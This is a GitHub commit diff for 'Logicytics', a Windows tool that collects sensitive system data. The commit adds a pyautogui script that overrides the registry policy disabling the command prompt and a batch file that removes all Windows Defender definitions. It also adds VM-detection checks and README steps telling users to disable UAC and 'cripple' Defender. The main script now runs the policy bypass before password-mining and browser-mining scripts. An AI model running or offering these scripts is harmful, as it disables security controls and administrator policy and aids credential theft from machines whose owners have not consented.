Skip to content

Commit 4690052

Browse files
Add files via upload
1 parent c6f73d8 commit 4690052

13 files changed

+250
-11
lines changed

CODE/CMD_Disabled_Bypass.py

+28
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
import pyautogui
2+
import time
3+
4+
# Wait a bit to ensure the script is ready to run
5+
time.sleep(2)
6+
7+
# Simulate pressing Win+R to open the Run dialog
8+
pyautogui.hotkey('win', 'r')
9+
10+
# Wait a bit for the Run dialog to appear
11+
time.sleep(1)
12+
13+
# Type the command to enable the command prompt
14+
pyautogui.write('cmd.exe /k "REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f"')
15+
16+
# Press Enter to execute the command
17+
pyautogui.press('enter')
18+
19+
# Wait a bit for the command to execute and the command prompt to open
20+
time.sleep(5)
21+
22+
# Simulate pressing Alt+F4 to close the command prompt window
23+
pyautogui.hotkey('alt', 'f4')
24+
25+
# Wait a bit to ensure the command prompt window is closed
26+
time.sleep(2)
27+
28+
print("Command executed to enable the command prompt and the window has been closed.")

CODE/DebugBeta.py

+63
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
11
import os
22
import sys
3+
import re
34
import subprocess
45

56

@@ -26,6 +27,54 @@ def open_debug_file():
2627
pass # Placeholder for adding content to DEBUG.md
2728

2829

30+
def check_vm():
31+
# Command to check for virtual machine indicators in the system model information
32+
command = "systeminfo | findstr /C:\"System Model\""
33+
34+
try:
35+
# Execute the command and capture the output
36+
result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, text=True)
37+
38+
# Use regular expressions to check for virtual machine indicators
39+
if re.search(r"VirtualBox|VBOX|VMWare", result.stdout):
40+
message = "Running in a virtual machine."
41+
else:
42+
message = "Not running in a virtual machine."
43+
44+
# Write the message to a file only once, after the check is complete
45+
with open(os.path.join(os.getcwd(), "DEBUG.md"), "a") as debug_file:
46+
debug_file.write(f"<span style=\"color:green;\">SYSTEM</span>: {message}<br><br>")
47+
except subprocess.CalledProcessError as e:
48+
# Handle errors from the subprocess call
49+
message = f"Error executing command: {e.stderr}"
50+
with open(os.path.join(os.getcwd(), "DEBUG.md"), "a") as debug_file:
51+
debug_file.write(f"<span style=\"color:red;\">ERROR</span>: {message}<br><br>")
52+
53+
54+
def cmd_raw(command, check):
55+
# The command to be executed
56+
try:
57+
# Execute the command and capture the output
58+
result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, text=True)
59+
60+
if check == "bool": # If check is "bool", return the command output or an empty string if it's empty
61+
output = result.stdout.strip() # Remove leading/trailing whitespace
62+
if output: # If the output is not empty
63+
return output
64+
else:
65+
return "" # Return an empty string if the output is empty
66+
else: # Write the command output to a file
67+
with open(os.path.join(os.getcwd(), "DEBUG.md"), "a") as debug_file:
68+
debug_file.write(f"<span style=\"color:green;\">SYSTEM</span>: {result.stdout}<br><br>")
69+
except subprocess.CalledProcessError as e:
70+
if check == "bool": # If check is "bool", return an empty string or an error message
71+
return "" # Return an empty string
72+
else: # Handle errors from the subprocess call
73+
message = f"Error executing command: {e.stderr}"
74+
with open(os.path.join(os.getcwd(), "DEBUG.md"), "a") as debug_file:
75+
debug_file.write(f"<span style=\"color:red;\">ERROR</span>: {message}<br><br>")
76+
77+
2978
def check_version_file(version_file_path):
3079
if not os.path.exists(version_file_path):
3180
with open(os.path.join(os.getcwd(), "DEBUG.md"), "a") as debug_file:
@@ -108,6 +157,20 @@ def main():
108157
check_uac_status()
109158
check_admin_privileges()
110159
check_powershell_execution_policy()
160+
check_vm()
161+
cmd_raw("systeminfo", "null")
162+
cmd_raw("wmic bios get serialnumber", "null")
163+
cmd_raw("wmic computersystem get model", "null")
164+
cmd_raw("wmic computersystem get manufacturer", "null")
165+
if cmd_raw("driverquery | findstr /C:\"vmxnet\"", "bool") == "":
166+
with open(os.path.join(os.getcwd(), "DEBUG.md"), "a") as debug_file:
167+
debug_file.write(
168+
"<span style=\"color:green;\">SYSTEM</span>: No VM Drivers Found.<br><br>")
169+
else:
170+
cmd_raw("driverquery | findstr /C:\"vmxnet\"", "null")
171+
cmd_raw("wmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status", "null")
172+
cmd_raw("wmic computersystem get totalphysicalmemory", "null")
173+
cmd_raw("systeminfo | findstr /C:\"System Model\" /C:\"Manufacturer\"", "null")
111174

112175

113176
if __name__ == "__main__":

CODE/Logicytics.py

+1-1
Original file line numberDiff line numberDiff line change
@@ -54,7 +54,7 @@ def is_admin():
5454
def main():
5555
set_execution_policy()
5656
checks()
57-
for script_path in ["./Copy_System_Files.py", "./Browser_And_Policies_Miner.ps1", "./Window_Features_Lister.bat",
57+
for script_path in ["./CMD_Disabled_Bypass.py", "./Copy_System_Files.py", "./Browser_And_Policies_Miner.ps1", "./Window_Features_Lister.bat",
5858
"./Antivirus_Finder.ps1", "./Simple_Password_Miner.py", "./Copy_Media.py",
5959
"./System_Info_Grabber.py", "./Zipper.py"]:
6060
execute_code(script_path)

CODE/Window_Defender_Crippler.bat

+18
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
@echo off
2+
setlocal
3+
4+
:: Debugging: Echo the path to MpCmdRun.exe to verify it's being resolved correctly
5+
echo Checking MpCmdRun.exe path: C:\Program Files\Windows Defender\MpCmdRun.exe
6+
7+
:: Check if Windows Defender signatures are removed
8+
for /f "tokens=*" %%a in ('"C:\Program Files\Windows Defender\MpCmdRun.exe" -ShowSignatureUpdates') do (
9+
if "%%a"=="No signature updates are available." (
10+
echo Signature updates are already removed. Reinstalling now...
11+
"C:\Program Files\Windows Defender\MpCmdRun.exe" -UpdateSignature
12+
) else (
13+
echo Signature updates are available. Removing now...
14+
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
15+
)
16+
)
17+
18+
endlocal

Credit.md

+8-2
Original file line numberDiff line numberDiff line change
@@ -4,10 +4,16 @@ This project is built on the shoulders of giants and inspired by the work of man
44

55
## Bootstrap by twbs
66

7-
We are grateful for the foundational work provided by Bootstrap, a popular open-source toolkit for developing responsive, mobile-first projects on the web. Bootstrap's comprehensive documentation and community support have been invaluable in shaping our project contributing.md and Issue Templates.
7+
We are grateful for the work provided by Bootstrap, a popular open-source toolkit for developing responsive, mobile-first projects on the web. Bootstrap's comprehensive documentation has been valuable in shaping our project contributing.md and Issue Templates.
88

99
- [Bootstrap GitHub Repository](https://github.com/twbs/bootstrap)
1010

11+
## winPEAS-ng by peas
12+
13+
We are grateful for the foundational work provided by winPEAS, a perfect open-source tool for scanning dynamic window systems in a responsive, colorful manner. winPEAS's comprehensive documentation has been invaluable in helping indirectly shape our project by allowing escalation and post-exploitation actions.
14+
15+
- [winPEAS-ng GitHub Repository](https://github.com/peass-ng)
16+
1117
## evil3ad for Collect-MemoryDump
1218

1319
We would like to extend our sincere thanks to evil3ad for the development and incorporation of Collect-MemoryDump into our main project. This tool has been instrumental in automating the process of memory dump collection, significantly improving our efficiency and effectiveness in forensic investigations.
@@ -16,7 +22,7 @@ We would like to extend our sincere thanks to evil3ad for the development and in
1622

1723
## Magnet Forensics
1824

19-
Magnet Forensics has been a crucial dependency for our tool, providing essential functionalities that have enriched our capabilities. We are grateful for the following tools from Magnet Forensics that have been integrated into our workflow:
25+
Magnet Forensics has been a crucial dependency for our tool, providing essential functionalities that have enriched our abilities. We are grateful for the following tools from Magnet Forensics that have been integrated into our workflow:
2026

2127
- [MAGNET DumpIt for Windows](https://www.magnetforensics.com/resources/magnet-dumpit-for-windows/)
2228
- [MAGNET Encrypted Disk Detector](https://www.magnetforensics.com/resources/encrypted-disk-detector/)
+27
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
# Python Script Explanation
2+
3+
This Python script uses the `pyautogui` library to automate the process of enabling the Command Prompt on a Windows system through the Registry Editor. It follows these steps:
4+
5+
1. **Wait**: The script starts by waiting for 2 seconds to ensure it's ready to run. This delay can be adjusted based on the system's responsiveness.
6+
7+
2. **Open Run Dialog**: It simulates pressing the `Win+R` keys to open the Run dialog box, which is used to execute commands directly from the Windows desktop.
8+
9+
3. **Wait for Run Dialog**: After opening the Run dialog, the script waits for 1 second to ensure the dialog is ready to accept input.
10+
11+
4. **Type Command**: It then uses `pyautogui.write` to type a command into the Run dialog. This command uses `REG add` to modify the Windows Registry and set the `DisableCMD` value under `HKCU\Software\Policies\Microsoft\Windows\System` to `0`, effectively enabling the Command Prompt. The `/k` switch is used to keep the Command Prompt window open after executing the command.
12+
13+
5. **Execute Command**: After typing the command, the script simulates pressing the `Enter` key to execute the command.
14+
15+
6. **Wait for Command Execution**: It waits for 5 seconds to allow the command to execute and the Command Prompt window to open. This delay can vary based on system performance and the time it takes for the Registry change to take effect.
16+
17+
7. **Close Command Prompt**: Once the Command Prompt window is open, the script simulates pressing `Alt+F4` to close the window.
18+
19+
8. **Wait for Window Closure**: Finally, it waits for 2 seconds to ensure the Command Prompt window is closed before proceeding.
20+
21+
9. **Print Completion Message**: The script prints a message indicating that the command has been executed to enable the Command Prompt, and the window has been closed.
22+
23+
## Usage
24+
25+
This script is useful for automating the process of enabling the Command Prompt on a Windows system, which can be particularly helpful in environments where the Command Prompt is disabled by default. It provides a quick and efficient way to re-enable the Command Prompt without manually navigating through the Registry Editor or Group Policy settings.
26+
27+
However, it's important to note that modifying the Windows Registry can have significant effects on the system's behavior and security. Therefore, this script should be used with caution and understanding of the implications. Additionally, the use of `pyautogui` for automating keyboard and mouse inputs can be affected by screen resolution, DPI settings, and other factors, so it may require adjustments for different systems or environments.
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
# Batch Script Explanation
2+
3+
This batch script is designed to manage the Windows Defender signatures on a Windows system. It checks if Windows Defender signatures are already removed and then either reinstalls them or removes all signature updates, depending on the current state. Here's a detailed breakdown of its functionality:
4+
5+
## Script Breakdown
6+
7+
### `@echo off`
8+
9+
This command turns off the display of commands in the command prompt window, making the output cleaner and easier to read.
10+
11+
### `setlocal`
12+
13+
This command starts a new local environment for the batch file. Variables and environment changes made within this script will not affect the global environment.
14+
15+
### `for /f "tokens=*"`
16+
17+
This loop iterates over the output of the command enclosed in parentheses. The `tokens=*` option ensures that the entire line is treated as a single token, allowing the script to work with the full output of the command.
18+
19+
### `"%Program Files%\Windows Defender\MpCmdRun.exe" -ShowSignatureUpdates`
20+
21+
This command runs the Windows Defender `MpCmdRun.exe` utility with the `-ShowSignatureUpdates` option, which checks for available signature updates. The output of this command is processed by the `for` loop.
22+
23+
### `if "%%a"=="No signature updates are available."`
24+
25+
This conditional statement checks if the output from the `MpCmdRun.exe` command indicates that no signature updates are available. If this condition is true, it means that Windows Defender signatures are already removed.
26+
27+
### `echo Signature updates are already removed. Reinstalling now...`
28+
29+
If the signatures are already removed, the script echoes a message indicating that it will now reinstall the signatures.
30+
31+
### `"%Program Files%\Windows Defender\MpCmdRun.exe" -UpdateSignature`
32+
33+
This command runs the `MpCmdRun.exe` utility with the `-UpdateSignature` option, which reinstalls the Windows Defender signatures.
34+
35+
### `else`
36+
37+
If the signatures are not already removed, the script proceeds to the `else` block.
38+
39+
### `echo Signature updates are available. Removing now...`
40+
41+
This message indicates that the script will now remove all signature updates.
42+
43+
### `"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All`
44+
45+
This command runs the `MpCmdRun.exe` utility with the `-RemoveDefinitions -All` options, which removes all signature updates from Windows Defender.
46+
47+
### `endlocal`
48+
49+
This command ends the local environment started by `setlocal`, returning control to the global environment.
50+
51+
## Usage
52+
53+
This script is useful for managing Windows Defender signatures, especially in scenarios where you need to ensure that all signature updates are removed or reinstated. It provides a straightforward way to check the current state of Windows Defender signatures and perform the necessary action based on that state.
54+
55+
However, it's important to use such scripts with caution, as removing or reinstalling Windows Defender signatures can affect the system's security and functionality. Always ensure that you understand the implications of these actions and consider the security requirements of your system.

EXTRA/GodMode.py

+23
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
import pyautogui
2+
3+
4+
def open_run_dialog():
5+
# Press Windows + R
6+
pyautogui.hotkey('win', 'r')
7+
8+
9+
def type_and_execute_command():
10+
# Type the command
11+
command = "shell:::{ED7BA470-8E54-465E-825C-99712043E01C}"
12+
pyautogui.write(command)
13+
# Press Enter to execute the command
14+
pyautogui.press('enter')
15+
16+
17+
def main():
18+
open_run_dialog()
19+
type_and_execute_command()
20+
21+
22+
if __name__ == "__main__":
23+
main()

EXTRA/What Is This.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@ All tools are archived, to use them extract them to the same directory... Still
1818

1919
3. **Following On-Screen Instructions:** After executing the script, follow the on-screen instructions provided by the tool. This process can take approximately 1 hour to complete, depending on the system's specifications and the amount of data being processed.
2020

21-
### God_Mode for Setting manipulation
21+
### GodMode for Setting manipulation
2222

2323
**Tool Description:** `God_Mode.py` by DefinetlyNotAI is a utility designed to automatically open god-mode without leaving traces. It's a powerful tool that can be used for educational purposes to manipulate certain settings usually scattered in the control panel.
2424

EXTRA/winPEAS.rar

18.3 KB
Binary file not shown.

README.md

+21-5
Original file line numberDiff line numberDiff line change
@@ -2,11 +2,9 @@
22

33
Welcome to **Logicytics** (Spelled Loj-ee-cit-iks), a powerful tool designed to harvest and collect a wide range of windows system data for forensics, it is a actively worked on project that uses python as its main language, its whole idea is it effectively gathers as much sensitive data as possible and outputs it into a ZIP file. This guide will help you get started with using DataVoyager effectively.
44

5-
This Software is around `32MB` as in version `1.1.2`.
6-
75
## Prerequisites
86

9-
Before running Logicytics, it's recommended to first disable User Account Control (UAC) to ensure smooth operation. You can do this by running the `UACPY.py` script as an administrator in the Command Prompt (cmd). Here's how:
7+
Before running Logicytics, it's recommended to first disable User Account Control (UAC) to ensure smooth operation as well as enable cmd. You can do this by running the `UACPY.py` script as an administrator in the Command Prompt (cmd). Here's how:
108

119
1. Open Command Prompt as an administrator. You can do this by searching for `cmd` in the Start menu, right-clicking on it, and selecting "Run as administrator".
1210
2. Navigate to the directory where `UACPY.py` is located.
@@ -15,7 +13,10 @@ Before running Logicytics, it's recommended to first disable User Account Contro
1513
```powershell
1614
python UACPY.py
1715
```
18-
16+
or
17+
```powershell
18+
.\UACPY.py
19+
```
1920
Please note that this assumes you have Python installed on your system and that the `UACPY.py` script is located in the directory you navigate to in step 2. If Python is not installed or if you encounter any issues, you may need to install Python or adjust the command to point to your Python executable if it's not in your system's PATH.
2021

2122
It's also recommended to install all needed libraries, Here is how:
@@ -28,6 +29,13 @@ It's also recommended to install all needed libraries, Here is how:
2829
pip install -r requirements.txt
2930
```
3031

32+
Finally its recommended to cripple windows defender, you can try to do so by running the following command (Please note it might not always work, and you will need ADMIN to run the script!):
33+
34+
```powershell
35+
.\Window_Defender_Crippler.bat
36+
```
37+
38+
Running it again will re-install those signatures, so after completing your job, re-run this file again.
3139
## Running Logicytics
3240

3341
To run the main program, you need to execute `Logicytics.py` with administrative privileges (Note its not needed to run as admin, but half of it's functionality would be disabled). Follow these steps:
@@ -39,6 +47,10 @@ To run the main program, you need to execute `Logicytics.py` with administrative
3947
```cmd
4048
python Logicytics.py
4149
```
50+
or
51+
```powershell
52+
.\Logicytics.py
53+
```
4254

4355
## Running Debugger
4456

@@ -52,6 +64,10 @@ To run the debugger program (Still in beta versions), you need to execute `Debug
5264
```cmd
5365
python DebugBeta.py
5466
```
67+
or
68+
```powershell
69+
.\DebugBeta.py
70+
```
5571

5672
Make sure the `.structure` file is present, if you don't have it, redownload the `structure.py` found in the SYSTEM directory of the this repo.
5773

@@ -76,4 +92,4 @@ Make sure the `.structure` file is present, if you don't have it, redownload the
7692

7793
Logicytics is a powerful tool for system data analysis. By following the instructions above, you can ensure a smooth and effective data collection process. Remember, the key to successful data harvesting is patience and adherence to the guidelines provided. Happy data mining!
7894

79-
And We are not responsible for any illegal usage of this product.
95+
We are not responsible for any illegal usage of this product.

SYSTEM/Logicystics.structure

+4-1
Original file line numberDiff line numberDiff line change
@@ -8,20 +8,22 @@
88
=structure.py
99
=CODE\Antivirus_Finder.ps1
1010
=CODE\Browser_And_Policies_Miner.ps1
11+
=CODE\CMD_Disabled_Bypass.py
1112
=CODE\Copy_Media.py
1213
=CODE\Copy_System_Files.py
13-
=CODE\DEBUG.md
1414
=CODE\DebugBeta.py
1515
=CODE\Logicytics.py
1616
=CODE\Simple_Password_Miner.py
1717
=CODE\System_Info_Grabber.py
1818
=CODE\Tree_Command.bat
1919
=CODE\UAC.ps1
2020
=CODE\UACPY.py
21+
=CODE\Window_Defender_Crippler.bat
2122
=CODE\Window_Features_Lister.bat
2223
=CODE\Zipper.py
2324
=EXPLAIN\Antivirus Finder Explained.md
2425
=EXPLAIN\Browser And Policies Miner Explained.md
26+
=EXPLAIN\CMD Disabled Bypass Explained.md
2527
=EXPLAIN\Copy Media Explained.md
2628
=EXPLAIN\Copy System Files Explained.md
2729
=EXPLAIN\DebugBeta Explained.md
@@ -32,4 +34,5 @@
3234
=EXPLAIN\UAC Explained.md
3335
=EXPLAIN\UACPY Explained.md
3436
=EXPLAIN\Window Features Lister Explained.md
37+
=EXPLAIN\Windows Defender Crippler Explained.md
3538
=EXPLAIN\Zipper Explained.md

requirements.txt

+1-1
Original file line numberDiff line numberDiff line change
@@ -13,4 +13,4 @@ socket
1313
re
1414
uuid
1515
psutil
16-
wmi
16+
wmi

0 commit comments

Comments
 (0)